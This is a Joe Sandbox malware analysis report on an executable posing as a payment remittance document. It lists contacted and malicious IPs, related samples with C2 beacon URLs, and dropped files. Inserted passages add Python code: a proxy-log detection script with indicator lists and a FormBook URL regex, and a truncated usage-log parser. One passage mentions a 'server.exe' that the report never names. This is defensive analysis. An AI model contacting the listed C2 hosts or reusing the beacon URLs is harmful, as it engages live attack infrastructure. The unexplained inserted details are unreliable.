                                                      http://www.fontbureau.comcevaElectronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.219234603.0000000005F2F000.00000004.00000001.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://www.carterandcone.comYouElectronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.213423791.0000000005F2F000.00000004.00000001.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://www.carterandcone.comoElectronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.213423791.0000000005F2F000.00000004.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      unknown
                                                      http://www.founder.com.cn/cnczElectronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.213011209.0000000005F2D000.00000004.00000001.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://www.jiyu-kobo.co.jp/Y0nlElectronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.214635046.0000000005F2F000.00000004.00000001.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://www.jiyu-kobo.co.jp/jp/Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.214635046.0000000005F2F000.00000004.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      unknown
                                                      http://www.sandoll.co.krQKElectronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.212459989.0000000005F2D000.00000004.00000001.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://www.fontbureau.comdElectronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.217155173.0000000005F2F000.00000004.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      unknown
                                                      http://www.fontbureau.comdAOElectronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.216654283.0000000005F2F000.00000004.00000001.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://www.carterandcone.com%$I/dElectronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.213161728.0000000005F2F000.00000004.00000001.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      low
                                                      http://www.carterandcone.commElectronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.213196484.0000000005F2F000.00000004.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      unknown
                                                      http://www.carterandcone.comlElectronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000002.229094156.0000000007192000.00000004.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      unknown
                                                      http://www.fontbureau.com/designers/cabarga.htmlNElectronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000002.229094156.0000000007192000.00000004.00000001.sdmpfalse
                                                        high
                                                        http://www.carterandcone.como..Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.213423791.0000000005F2F000.00000004.00000001.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        low
                                                        http://www.founder.com.cn/cnElectronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.213011209.0000000005F2D000.00000004.00000001.sdmp, Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.212822532.0000000005F2D000.00000004.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        http://www.fontbureau.com/designers/frere-jones.htmlElectronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.216985898.0000000005F2F000.00000004.00000001.sdmp, Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000002.229094156.0000000007192000.00000004.00000001.sdmpfalse
                                                          high
                                                          http://www.jiyu-kobo.co.jp/tElectronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.214195042.0000000005F2D000.00000004.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          unknown
                                                          http://www.carterandcone.comzElectronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.213423791.0000000005F2F000.00000004.00000001.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://www.carterandcone.comyElectronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.213244678.0000000005F2F000.00000004.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          unknown
                                                          http://www.jiyu-kobo.co.jp/;O$dhElectronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.214635046.0000000005F2F000.00000004.00000001.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://www.jiyu-kobo.co.jp/Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.214635046.0000000005F2F000.00000004.00000001.sdmp, Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.213811208.0000000005F2D000.00000004.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          unknown
                                                          http://www.fontbureau.comoElectronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.217155173.0000000005F2F000.00000004.00000001.sdmp, Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.216654283.0000000005F2F000.00000004.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          unknown
                                                          http://www.fontbureau.com/designers8Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000002.229094156.0000000007192000.00000004.00000001.sdmpfalse
                                                            high
                                                            http://www.micro(D.dfElectronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.213284821.0000000005F2F000.00000004.00000001.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            low
                                                            http://www.fontbureau.comalsElectronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.217155173.0000000005F2F000.00000004.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            unknown
                                                            http://www.zhongyicts.com.cnrsCIElectronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.213161728.0000000005F2F000.00000004.00000001.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://www.jiyu-kobo.co.jp/VOElectronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.214635046.0000000005F2F000.00000004.00000001.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://www.fontbureau.comcomSElectronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.216127582.0000000005F2F000.00000004.00000001.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://www.jiyu-kobo.co.jp/jp/0OElectronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.213925578.0000000005F2D000.00000004.00000001.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://www.carterandcone.comuehElectronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.213423791.0000000005F2F000.00000004.00000001.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://www.jiyu-kobo.co.jp/-O6dElectronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.214635046.0000000005F2F000.00000004.00000001.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown

                                                            Contacted IPs


                                                            Public

IP | Domain | Country | ASN | ASN Name | Malicious
52.71.133.130 | www.johnharrisagent.com | United States | 14618 | AMAZON-AES, US | false
198.54.117.211 | unknown | United States | 22612 | NAMECHEAP-NET, US | true
103.15.104.66 | v3lala99.cdnddd.net | Malaysia | 55720 | GIGABIT-MY Gigabit Hosting Sdn Bhd, MY | true
198.54.117.215 | parkingpage.namecheap.com | United States | 22612 | NAMECHEAP-NET, US | false

                                                            General Information

                                                            Joe Sandbox Version:33.0.0 White Diamond
                                                            Analysis ID:483527
                                                            Start date:15.09.2021
                                                            Start time:08:14:45
                                                            Joe Sandbox Product:CloudBasic
                                                            Overall analysis duration:0h 10m 3s
                                                            Hypervisor based Inspection enabled:false
                                                            Report type:light
                                                            Sample file name:Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe
                                                            Cookbook file name:default.jbs
                                                            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed:28
                                                            Number of new started drivers analysed:0
                                                            Number of existing processes analysed:0
                                                            Number of existing drivers analysed:0
                                                            Number of injected processes analysed:0
                                                            Technologies:
                                                            • HCA enabled
                                                            • EGA enabled
                                                            • HDC enabled
                                                            • AMSI enabled
                                                            Analysis Mode:default
                                                            Analysis stop reason:Timeout
                                                            Detection:MAL
                                                            Classification:mal100.troj.evad.winEXE@8/1@11/4
                                                            EGA Information:
                                                            • Successful, ratio: 100%
                                                            HDC Information:
                                                            • Successful, ratio: 63.9% (good quality ratio 57.1%)
                                                            • Quality average: 69.4%
                                                            • Quality standard deviation: 32.7%
                                                            HCA Information:
                                                            • Successful, ratio: 97%
                                                            • Number of executed functions: 0
                                                            • Number of non-executed functions: 0
                                                            Cookbook Comments:
                                                            • Adjust boot time
                                                            • Enable AMSI
                                                            • Found application associated with file extension: .exe
                                                            Warnings:
                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                            • Excluded IPs from analysis (whitelisted): 92.122.145.220, 204.79.197.200, 13.107.21.200, 20.82.210.154, 23.35.236.56, 40.112.88.60, 23.216.77.209, 23.216.77.208
                                                            • Excluded domains from analysis (whitelisted): www.bing.com, fs.microsoft.com, dual-a-0001.a-msedge.net, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, store-images.s-microsoft.com-c.edgekey.net, e1723.g.akamaiedge.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, www-bing-com.dual-a-0001.a-msedge.net, arc.trafficmanager.net, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net
• Not all processes were analyzed; the report is missing behavior information
                                                            • Report size getting too big, too many NtAllocateVirtualMemory calls found.

                                                            Simulations

                                                            Behavior and APIs

Time | Type | Description
08:15:36 | API Interceptor | 64x Sleep call for process: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe modified

                                                            Joe Sandbox View / Context

                                                            IPs

Match: 52.71.133.130
Associated Sample Name / URL | Detection | Context
catalogo campione_0021.exe | malicious | www.blonohomesales.com/p3q8/?XjEP7rn=SmJymXHTOHzh2mODpH0/b6a2rttU4EqyY620WTN4/2YO0WOF3CKHJjBQQ+H+msZQkWXKyJfovg==&QPK=5jV4hVZ
revised quotation.exe | malicious | www.britrobertsrealtor.com/n58i/?MDHhFT=mBK5C8kKNeLnOBRL/3T2hMZE7okfl7IAcP/kfUwDuOFDQo447qX7+h6WtHNcYYtcMFZ+&h6=u0DLr058
NEW ORDER.exe | malicious | www.britrobertsrealtor.com/n58i/?0FNpaj8=mBK5C8kKNeLnOBRL/3T2hMZE7okfl7IAcP/kfUwDuOFDQo447qX7+h6WtHN2HodcIHR+&rPJpgz=GBMHuTwhVBI
BL COPY.exe | malicious | www.britrobertsrealtor.com/n58i/?tr4x8=1bxhLR18&IX3h5l=mBK5C8kKNeLnOBRL/3T2hMZE7okfl7IAcP/kfUwDuOFDQo447qX7+h6WtHNcYYtcMFZ+
bH8nV98LYu.exe | malicious | www.shirleyabrowerrealtor.com/fa0p/?zR0XgB=gPIx3pDxYlK&4hl0ibR=MvRmTuLwwyQZwgK3YYiG7KB5GvnBlUZ8DFUO14mvI6WqMsSM4hixWFgVlLnCQryC99za
xrHGQS1rz2.exe | malicious | www.irenehigginson.com/i7dg/?Qz=KBZ4dj0XENkP&2dnpGhRp=RKv9R3r324rqECNMQpwQcD+TtNzrebiuQaqq6euW1C9OfeVYpIPiEjipJWSoTYE6epD/
Scan#0068-46c3365.exe | malicious | www.andrewsteelsells.com/q3t0/?-Zl=6idTJ3MAhmjthBNVTJ2XuDMtfLW/2CXP3uLaEMGhGmhIqOq2RVzpVswBfbFOtMAa4qr0&gJBT-f=IFNTv2l8I
Shipping Documents.exe | malicious | www.hopematthewsrealtor.com/amb6/?c8n=8pm2sjSgmmTSFscavwD5UpILjrVjpPh3mP/S3l2xoyuhTXjCVVPg3vinZEFiQZEl0/31&Vt=QZbpwDmh5dWDM
IMAGE00037.exe | malicious | www.jasoneganrealtor.com/kkt/?0DKlKl=cc/nqGYAQYIM3Pt1Xwy2u5TuLJzmwQtvr0clQyawalrzoTK8+eLnoTutccqTHVKswWI+&UL=0balqH
FASMW.EXE | malicious | www.findthematchmakerrealtor.com/cabq/?h6R8xP=L/FIdmi9M2kSKwf8ScI+8YDyUdwD7p7Kj2yVOc9WwOzkqPyEJC2VW+A/3pD6I5dSpBvh&iZ=2di86hvH
EJIMS.exe | malicious | www.howdysellshomes.com/eo5u/?3fqHGn=ZlnpMphxFT&ATRPZLx=yfSEZOF/V+aHR3Qqu+TOTlJolf6SRhlBlkgMTnrUi9a7ISsQSkzVdaPaAGQDw9tGN+zc
SA-NQAW12n-NC9W03-pdf.exe | malicious | www.blakehaleyrealestate.com/uwec/?Rl4=YVFTx4yh&GFQl9jnp=9RHT2DLP46IJWlpPTosGw7NRwYJtTk68eEdvTXInG9v5n7yAqhkX2tGT0EYgCY2WM8rv
RFQ-V-SAM-0321D056-DOC.exe | malicious | www.blakehaleyrealestate.com/uwec/?v2=9RHT2DLP46IJWlpPTosGw7NRwYJtTk68eEdvTXInG9v5n7yAqhkX2tGT0EYgCY2WM8rv&CZ6=7nExZbW
TSPO0001978-xlxs.exe | malicious | www.blakehaleyrealestate.com/uwec/?-ZVd=1bgta&T8VxaVs=9RHT2DLP46IJWlpPTosGw7NRwYJtTk68eEdvTXInG9v5n7yAqhkX2tGT0EYgCY2WM8rv
igPVY6UByI.exe | malicious | www.gregismyrealestateagent.com/evpn/?6lB4ir3X=UDxzuRprqZDJvJoKVzbwL1i6nUgviHPd/6Kvoeyj55HiZxQYyGLzJE1yAaeHFu5gVc5c&lZQ=fxoxjP38
MACHINE SPECIFICATIONS.exe | malicious | www.melekhemfuzaylovrealtor.com/rrrq/?ATxdA4s=pwrgH0dcWtE6RcnjvsF+gBwj2enFa+fTozhnxLgTWRaQ9ETFCh2EIcQryx3dD2YPpuUAmv+cig==&4hO=uDHPhJIxONuPbDb
purchase order#034.exe | malicious | www.patticrumprealestate.com/8ufh/?EzrthRhp=U8w9/jPqiyF9T6rAv+nd1qZLEbDwevisuc0vxVqKX7gCId07x/wriiT59VLN/LUTeuQy&ojo0f=SzrhU8
dwg.exe | malicious | www.evamichellevermeeschrealtor.com/ripw/?YL0=AbZvoGEXXQ2UeGMkjKvPTH9y6CbrSsxy+uP80hsvy1agLthBgMYihPZc0BWoiy3movbA&DhAH08=9rzdODV81V
PO#416421.exe | malicious | www.propertiesbyjose.com/wpsb/?GFQL6=9rzdF4d0LhP&pvbxILHp=HEs1UZJZzTZh4b/CLgTQtUFl/p4LqgX1DDiD2qBPcXJWn7sMmrEWnzV34lgPleSeyaCceIjMPg==
POgMmI.exe | malicious | www.landeverrealestate.com/wsu/?FDHH=o0d7uZds/Uq3OyNWot+oiPxVX9Lhq1LOweo6JSl71P7OyksdMpdvphbquE+Kn7tuvWRF0Atuwg==&Rl=Vtx0J
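The C2 URL extracted from server.exe and the twenty related URLs listed against 52.71.133.130 share one shape: a short lowercase alphanumeric path segment (/uytf/, /p3q8/, /n58i/, /kkt/), a trailing slash, and a query in which at least one parameter carries a long base64-like blob. The Python below is an added example written for this page, not code from the Joe Sandbox report or from the sample; it turns the Contacted IPs table and that URL shape into a small proxy-log triage check. The log line format, the KNOWN_C2_HOSTS and KNOWN_BAD_IPS sets, the regexes and all function names are assumptions for the example, and the log lines are constructed, not taken from the analysis pcap.

```python
import re
from urllib.parse import urlsplit

# Indicators copied from this report. A real deployment would load these
# from a feed rather than hard-code them.
KNOWN_C2_HOSTS = {"www.johnharrisagent.com"}
KNOWN_BAD_IPS = {"198.54.117.211", "103.15.104.66"}  # marked malicious under Contacted IPs

# Structural shape shared by the FormBook URLs in this report (assumed thresholds):
#   /<3-5 lowercase alphanumerics>/?<key>=<long base64-like value>[&<key>=<value>]
PATH_RE = re.compile(r"^/[a-z0-9]{3,5}/$")
BLOB_RE = re.compile(r"^[A-Za-z0-9+/]{40,}={0,2}$")


def split_query(query):
    """Split a query string by hand: urllib's parse_qsl would turn '+' into ' ',
    which corrupts the base64-like values we want to inspect."""
    pairs = []
    for part in query.split("&"):
        if not part:
            continue
        key, _, value = part.partition("=")
        pairs.append((key, value))
    return pairs


def looks_like_formbook(url):
    """True when the URL has the check-in shape seen in this report."""
    parts = urlsplit(url)
    if not PATH_RE.match(parts.path):
        return False
    values = [v for _, v in split_query(parts.query)]
    # At least one parameter must carry a long blob (the encoded beacon body).
    return any(BLOB_RE.match(v) for v in values)


def classify(dst_ip, url):
    """Return a verdict label for one request, or None when nothing matched."""
    host = urlsplit(url).hostname or ""
    if host in KNOWN_C2_HOSTS:
        return "known-c2-host"
    if dst_ip in KNOWN_BAD_IPS:
        return "known-bad-ip"
    if looks_like_formbook(url):
        return "formbook-url-pattern"
    return None


def scan_log(lines):
    """Parse 'timestamp src_ip dst_ip method url' lines (assumed format) and
    return (line_number, verdict, hostname) for every hit."""
    hits = []
    for n, line in enumerate(lines, 1):
        fields = line.split()
        if len(fields) < 5:
            continue
        _, _, dst_ip, _, url = fields[:5]
        verdict = classify(dst_ip, url)
        if verdict:
            hits.append((n, verdict, urlsplit(url).hostname))
    return hits


# Constructed sample lines; the URLs reuse indicators from this report so
# that each rule fires once, plus two benign requests that must not fire.
SAMPLE_LOG = [
    "2021-09-15T08:16:01Z 10.0.0.5 52.71.133.130 GET https://www.johnharrisagent.com/uytf/?4hax=1GgOydTR9rFB1tFiaPZsKtEWQf/ik/nrf61jzTsng/4mIf33LxMFmIGp7ra",
    "2021-09-15T08:16:03Z 10.0.0.5 198.54.117.211 GET http://www.example-parked.test/",
    "2021-09-15T08:16:07Z 10.0.0.5 203.0.113.10 GET http://www.blonohomesales.com/p3q8/?XjEP7rn=SmJymXHTOHzh2mODpH0/b6a2rttU4EqyY620WTN4/2YO0WOF3CKHJjBQQ+H+msZQkWXKyJfovg==&QPK=5jV4hVZ",
    "2021-09-15T08:16:09Z 10.0.0.5 13.107.21.200 GET https://www.bing.com/search?q=remittance",
    "2021-09-15T08:16:11Z 10.0.0.5 203.0.113.20 GET http://www.fontbureau.com/designers/frere-jones.html",
]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```

Two caveats come straight from the tables above. 52.71.133.130, the address www.johnharrisagent.com resolved to, sits in AMAZON-AES and is marked not malicious, and 198.54.117.215 is Namecheap's parking page; both are shared infrastructure, so the example keys on the domain and the URL shape rather than on those addresses. The path regex will also match unrelated short-path URLs, so treat a formbook-url-pattern hit as a triage lead to be confirmed against the process that made the request, not as a verdict.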

                                                            Domains

Match: parkingpage.namecheap.com
Associated Sample Name / URL | Detection | Context
debit.xlsx | malicious | 198.54.117.212
Data Sheet and Profile.exe | malicious | 198.54.117.215
4444.exe | malicious | 198.54.117.218
3RBawvxxeY.exe | malicious | 198.54.117.210
grace $$.exe | malicious | 198.54.117.212
RFQ_PO_009890_pdf.exe | malicious | 198.54.117.210
SpZP2QerMU.exe | malicious | 198.54.117.211
Purchase Order# 210145.exe | malicious | 198.54.117.215
RFQ 10305 .xlsx | malicious | 198.54.117.212
BIN.exe | malicious | 198.54.117.216
REMMITANCE COPY.exe | malicious | 198.54.117.210
jxotfrv2bv.exe | malicious | 198.54.117.212
zXv0Gd4tPi.exe | malicious | 198.54.117.210
PO747484992.exe | malicious | 198.54.117.217
YgAynTdpcncdnG4.exe | malicious | 198.54.117.217
PO_PRICE_REQUEST_00989_PDF.exe | malicious | 198.54.117.212
New order.pdf.exe | malicious | 198.54.117.215
PO.xlsx | malicious | 198.54.117.212
Transfer_form_$157,890.xlsx | malicious | 198.54.117.211
GosMzUpnGu.exe | malicious | 198.54.117.217

                                                            ASN

                                                            Match                                Associated Sample Name / URL                              Detection   Context
                                                            AMAZON-AES US                        PO7420.exe                                                malicious   52.4.209.250
                                                                                                 DLH1TwLBhW.exe                                            malicious   50.16.244.183
                                                                                                 avxeC9Wssi                                                malicious   54.57.110.152
                                                                                                 Quotation urgent.exe                                      malicious   52.201.24.227
                                                                                                 KOC RFQ.doc                                               malicious   52.204.77.43
                                                                                                 PO. 2100002_pdf____________________________________.exe   malicious   3.223.115.185
                                                                                                 hhh.mp3.dll                                               malicious   54.243.45.255
                                                                                                 xrm4z50ja9.exe                                            malicious   54.83.52.76
                                                                                                 Swift Trf.exe                                             malicious   52.201.24.227
                                                                                                 HjIXsbs4Jg                                                malicious   54.142.124.216
                                                                                                 7b388AC1Fw                                                malicious   44.194.145.151
                                                                                                 DPD.apk                                                   malicious   50.16.244.183
                                                                                                 Po2142021.xlsx                                            malicious   18.213.250.117
                                                                                                 FlashPlayerUpdate.apk                                     malicious   23.21.76.7
                                                                                                 QcXQmNSaSp                                                malicious   18.207.108.88
                                                                                                 i586                                                      malicious   34.231.175.5
                                                                                                 arm                                                       malicious   54.133.131.54
                                                                                                 zoD4YzpMMG                                                malicious   54.80.227.212
                                                                                                 mips                                                      malicious   34.225.41.128
                                                                                                 x86_64                                                    malicious   54.167.122.15
                                                            GIGABIT-MY GigabitHostingSdnBhd MY   Clh974QBqG                                                malicious   103.21.89.29
                                                                                                 k6uiZJTzLi.exe                                            malicious   103.91.67.83
                                                                                                 Y22uvB2InU.exe                                            malicious   103.91.67.83
                                                                                                 sbFQSOHQS9.exe                                            malicious   43.231.4.7
                                                                                                 zidwvnFsej.exe                                            malicious   43.231.4.7
                                                                                                 awVwuEPo4t.exe                                            malicious   43.231.4.7
                                                                                                 jr8m2SSa1e.exe                                            malicious   43.231.4.7
                                                                                                 z33RH5liBO.exe                                            malicious   103.91.67.83
                                                                                                 OIHcOp52HF.exe                                            malicious   43.231.4.7
                                                                                                 n5MFenscid.exe                                            malicious   43.231.4.7
                                                                                                 v6TB5C7KtW.exe                                            malicious   43.231.4.7
                                                                                                 OhfbJIz1X7.exe                                            malicious   43.231.4.7
                                                                                                 02xCEgwyK3.exe                                            malicious   43.231.4.7
                                                                                                 refno.exe                                                 malicious   103.91.67.83
                                                                                                 oaG6jOntjL                                                malicious   103.229.227.24
                                                                                                 UZOM POWER.exe                                            malicious   103.27.74.97
                                                                                                 JFBlvEr5H9.exe                                            malicious   103.91.67.83
                                                                                                 olG7GnXKKT.exe                                            malicious   103.91.67.83
                                                                                                 ORDER 200VPS.xlsx                                         malicious   103.91.67.83
                                                                                                 uLTvM5APNY.exe                                            malicious   43.231.4.7
                                                            NAMECHEAP-NET US                     P67mzce6yI.exe                                            malicious   198.54.122.60
                                                                                                 Guía de carga.pdf.exe                                     malicious   198.54.122.60
                                                                                                 debit.xlsx                                                malicious   198.54.117.212
                                                                                                 Pharmaceutical Inquiry.doc                                malicious   198.54.122.60
                                                                                                 diagram-129.doc                                           malicious   198.54.124.27
                                                                                                 diagram-129.doc                                           malicious   198.54.124.27
                                                                                                 diagram-129.doc                                           malicious   198.54.124.27
                                                                                                 deck.exe                                                  malicious   198.54.122.60
                                                                                                 diagram-477.doc                                           malicious   198.54.124.27
                                                                                                 diagram-477.doc                                           malicious   198.54.124.27
                                                                                                 diagram-477.doc                                           malicious   198.54.124.27
                                                                                                 PO0140092021.doc                                          malicious   198.54.122.60
                                                                                                 I210820-0002 D1隨機-海關發票-R1_pdf.exe                   malicious   198.54.115.133
                                                                                                 DHL-AWD6909800855.doc                                     malicious   104.219.248.49
                                                                                                 doc03633420210907151503.doc                               malicious   198.54.122.60
                                                                                                 obizx.exe                                                 malicious   104.219.248.49
                                                                                                 fytfireuiwfgdcukyd.doc                                    malicious   198.54.122.60
                                                                                                 DHL-AWD6909800855.doc                                     malicious   104.219.248.49
                                                                                                 wuH92YGkZk.exe                                            malicious   104.219.248.45
                                                                                                 3VFWIsGexy.exe                                            malicious   198.54.115.195

                                                            JA3 Fingerprints

                                                            No context

                                                            Dropped Files

                                                            No context

                                                            Created / dropped Files

                                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe.log
                                                            Process:C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):1302
                                                            Entropy (8bit):5.3499841584777394
                                                            Encrypted:false
                                                            SSDEEP:24:MLUE4K5E4Ks2E1qE4bE4K5AE4Kzr7RKDE4KhK3VZ9pKhPKIE4oKFKHKorE4x84j:MIHK5HKXE1qHbHK5AHKzvRYHKhQnoPtW
                                                            MD5:E2C3A19FF3EBB1649BF9F41DFE3B7E8F
                                                            SHA1:5DA8AB9561D3C096BB9103413F64EE6E50D5AD88
                                                            SHA-256:18E921771341555EF6167DEBBD7C83727518897E9B4B3545B7CCDB48E2043B74
                                                            SHA-512:6B62A68EC358699D55E4CCD0BBDD4ADDC0F38641D82A019697893CEB503E853A5F087FAF9F4408425AD6631C9CBA31C3354FD98B45F051F2F59A0ECC3CA2FA06
                                                            Malicious:true
                                                            Reputation:moderate, very likely benign file
                                                            Preview:
                                                            1,"fusion","GAC",0
                                                            1,"WinRT","NotApp",1
                                                            2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0
                                                            3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0
                                                            2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0
                                                            2,"System.Data, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0
                                                            3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21e8e2b95c\System.Xml.ni.dll",0
                                                            3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0
                                                            3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assem
                                                            Note: this is the CLR's own assembly usage log, written under %LOCALAPPDATA%\Microsoft\CLR_v4.0_32\UsageLogs\ for .NET Framework 4 processes, which is why it scores "very likely benign" despite the Malicious flag. The file is host-generated, but its content is evidence: it lists the framework assemblies (System.Windows.Forms, System.Drawing, System.Data, System.Xml, System.Core, System.Configuration) that the .NET loader stage resolved.
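The usage log above is the only file the sample dropped, and it is worth parsing rather than dismissing. The following is an added example (not code from the report or from Joe Sandbox) that reads the log's CSV-style records and returns the bound assemblies with version, public key token and native-image path. SAMPLE_LOG is constructed from the preview, leaving out the truncated last line; the record layout (numeric kind, quoted name, optional quoted path, trailing numeric flag) is inferred from that sample, and the meaning of the two numeric fields is an open assumption that the code passes through untouched.

```python
"""Parse the CLR UsageLogs file dropped above to list the bound assemblies.

Added example, not code from the report or from Joe Sandbox. SAMPLE_LOG is
constructed from the preview above; the truncated last line is left out.
The CLR writes this log itself (it feeds the automatic NGEN service), so its
presence is not an indicator, but its content records which framework
assemblies the .NET loader stage resolved.
"""
import csv
import io

SAMPLE_LOG = r'''1,"fusion","GAC",0
1,"WinRT","NotApp",1
2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0
3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0
2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0
2,"System.Data, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0
3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21e8e2b95c\System.Xml.ni.dll",0
3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0
'''

# Assemblies whose presence in a binary that describes itself as "Console"
# (see FileDescription in the Version Infos) deserves a second look.
GUI_ASSEMBLIES = {"System.Windows.Forms", "System.Drawing"}


def parse_usage_log(text: str) -> list:
    """Split each record into kind, name, extra quoted fields and trailing flag.

    Layout inferred from the sample: numeric kind, quoted name, optional
    quoted native-image path, numeric flag. The numeric fields are not
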